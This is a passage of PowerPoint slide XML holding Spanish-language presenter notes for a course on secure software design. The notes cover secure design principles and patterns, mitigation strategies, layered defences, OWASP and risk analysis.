                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>En resumen, el cumplimiento de requisitos mínimos de seguridad es fundamental en el desarrollo de software, y esto implica analizar los riesgos y tomar decisiones adecuadas. Además, debemos ser conscientes de la constante lucha por equilibrar costes, calidad y seguridad, especialmente cuando los recursos son limitados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC1190ED-CC36-9B2D-BC5E-39ED5B979A00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13632318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E6789-B594-2319-5CD4-31B0B0308E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011D84-82DE-6619-C771-78329E8CFB7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05ABE49-A7CF-A1AA-3BFE-E8A8251A61E3}"/>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67357120-88AD-4B7D-E683-F6FC02AA420C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367336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8B9A-C70C-C1B5-F6F2-871B86DA636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F518F2-8825-7AB9-4A64-B6F5BDE5BA5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4372CE6-2784-0BC1-B1F2-7059A4D45E8E}"/>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47931CF6-74F5-65E7-5356-9E096F3B769E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16810414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4F764-5CAB-0E5B-2678-179EAB326E3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DF9605E-8C03-75B6-C15C-7BFC25E397A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FEA7A0B-937F-2CEA-B0B6-7C39D0170E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s-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Comenzaremos hablando sobre los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Principios de Diseño Seguro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>. Estos son conceptos que nos guiarán en el diseño de sistemas que sean resistentes a los ataques desde el principio. Por ejemplo, minimizar la superficie de ataque significa reducir los puntos donde un ataque podría potencialmente entrar o extraer datos del sistema.</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20BA45B-83FA-D6EF-F5AE-D24CF42E53CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1550223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973B3-B7A1-55C7-EE9D-C153AFACE14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87E54C-3854-B6A0-69EB-BD74F32F7E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26DC8B-037A-C10E-09D8-ED806D911F17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Ahora, revisaremos algunos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Patrones de Diseño Seguro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> comunes que se pueden aplicar para mejorar la seguridad. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>- El 'Patrón </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Singleton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> Seguro' nos ayuda a asegurar que una clase tenga una única instancia, lo cual es útil en situaciones que requieren un único punto de control como un log de auditoría. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>- El 'Patrón de Fachada de Seguridad' nos permite proporcionar una interfaz unificada para un conjunto de interfaces en un sistema de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>sub-sistemas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>, lo que facilita la implementación de controles de seguridad. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>- Finalmente, el 'Patrón de Proxy de Seguridad' actúa como un intermediario que realiza acciones de seguridad, como autenticación y autorización, antes de permitir el acceso a un objeto real.</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0C79E5A-06FD-BC18-1165-613D1A6C896F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4030446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440D1-CA92-900F-97E4-61A75CF9E5E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9FD092-A910-CA19-FFEF-6DDB585888F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A45B17-475D-D0A9-EF79-6F7D9092C35E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Identificación de componentes críticos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>El primer paso en el diseño de una arquitectura segura es identificar los componentes críticos del sistema. Estos son los elementos que, si se ven comprometidos, pueden tener un impacto significativo en la seguridad y la funcionalidad del sistema. Algunos ejemplos de componentes críticos pueden incluir servidores de bases de datos, sistemas de autenticación, puntos de acceso a la red, aplicaciones web, y cualquier otro elemento que almacene, procese o transmita datos confidenciales.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Estrategias de mitigación:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Una vez identificados los componentes críticos, es importante implementar estrategias de mitigación para reducir las vulnerabilidades y minimizar los riesgos. Estas estrategias pueden incluir: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Autenticación y autorización robustas: Asegurarse de que solo usuarios autorizados tengan acceso a los recursos críticos. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Encriptación de datos: Proteger la información sensible mediante técnicas de encriptación adecuadas. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Actualizaciones y parches: Mantener los componentes del sistema actualizados para corregir vulnerabilidades conocidas. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Capas de seguridad:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Las capas de seguridad son niveles de defensa que se establecen para proteger los componentes críticos. Estas capas pueden incluir: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>- Firewall: Implementar cortafuegos para controlar el tráfico de red y bloquear amenazas conocidas.  (WAF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>- Segmentación de red: Dividir la red en segmentos aislados para limitar la propagación de ataques. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="1043056" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>- Seguridad en la aplicación: Validar y asegurar que las aplicaciones sean resistentes a ataques comunes, como inyecciones SQL o XSS (Cross-Site Scripting) (WAF)</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A562D29-B512-8832-7EC4-A9CE4B29C507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1592027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ED733-2360-C4EC-670A-473D6EED44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DB45DA5-4744-D7EB-40B9-B802B914B9A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DD162A-2DA0-BC54-CCF8-36938F0CAE8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>"OWASP significa 'Open Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Security Project'. Es una organización sin ánimo de lucro que busca mejorar la seguridad del software."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>"El OWASP Top 10 es un informe que se actualiza regularmente y lista las diez vulnerabilidades de seguridad más críticas que enfrentan las aplicaciones web hoy en día. Es un recurso inestimable tanto para desarrolladores como para administradores de seguridad."</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79FA6E2-33ED-A554-CEB4-A20DC4441CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1886138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196D7-AC3A-AB55-E586-DBDB341245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2A5093-99AD-4B68-3AB5-76C056F2CE8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2A16F9-A49D-73F6-BC4E-F27880CB14A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>"OWASP significa 'Open Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Security Project'. Es una organización sin ánimo de lucro que busca mejorar la seguridad del software."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>"El OWASP Top 10 es un informe que se actualiza regularmente y lista las diez vulnerabilidades de seguridad más críticas que enfrentan las aplicaciones web hoy en día. Es un recurso inestimable tanto para desarrolladores como para administradores de seguridad."</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30500A8-5D6C-500D-32E7-2FF18F4492F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3146187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5388-2556-87D7-CBF6-5291411024D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CC00EE-08C1-CF8C-B08D-5DF28645A8A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4B73C2-8B3B-8AF0-6218-C35FF802E21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A161DA8B-CF29-6AD9-B03E-9BDE85BEEF65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29332888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9A5F-BF0A-D813-282E-A77CC6A1C0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8A7B4D-F2DF-DAC9-DFEE-03F66AA27D7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F282400-4271-F8DC-E555-04E7AE07EF51}"/>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03ABFEF-73EC-A83C-2865-83E2446F1FA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2727697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EDE6F-F9B2-3CD7-85FD-E6D3E277DAA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98BBF9-4B58-D028-951C-CF3F41B2D0B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57AC760-2071-F1BD-E780-647645AF380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9862161-DD4E-E035-C0FF-20C92BC1F3E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109805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71B5B-9DF1-FC04-9A94-422A6A9FBB2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B42005-57D0-5F0B-C8D4-D96C5283A8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0F069FE-CB40-5BDD-BA39-9F7518296BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>En el desarrollo de software, es crucial cumplir con requisitos mínimos de seguridad. Sin embargo, estos requisitos pueden variar significativamente de un proyecto a otro. La clave está en analizar los riesgos y el contexto particular del software que estamos desarrollando para determinar los requisitos de seguridad necesarios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Análisis de riesgo</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Identificar y priorizar los riesgos en el proyecto es esencial.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Debes tomar decisiones sobre cómo responder a estos riesgos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Visión incompleta es mejor que ninguna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Es importante recordar que es preferible tener una visión incompleta de la seguridad de tu software que no tener ninguna.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Visibilidad y certeza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El análisis de riesgo proporciona visibilidad y certeza sobre la situación de seguridad del proyecto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="es-ES" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="es-ES" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
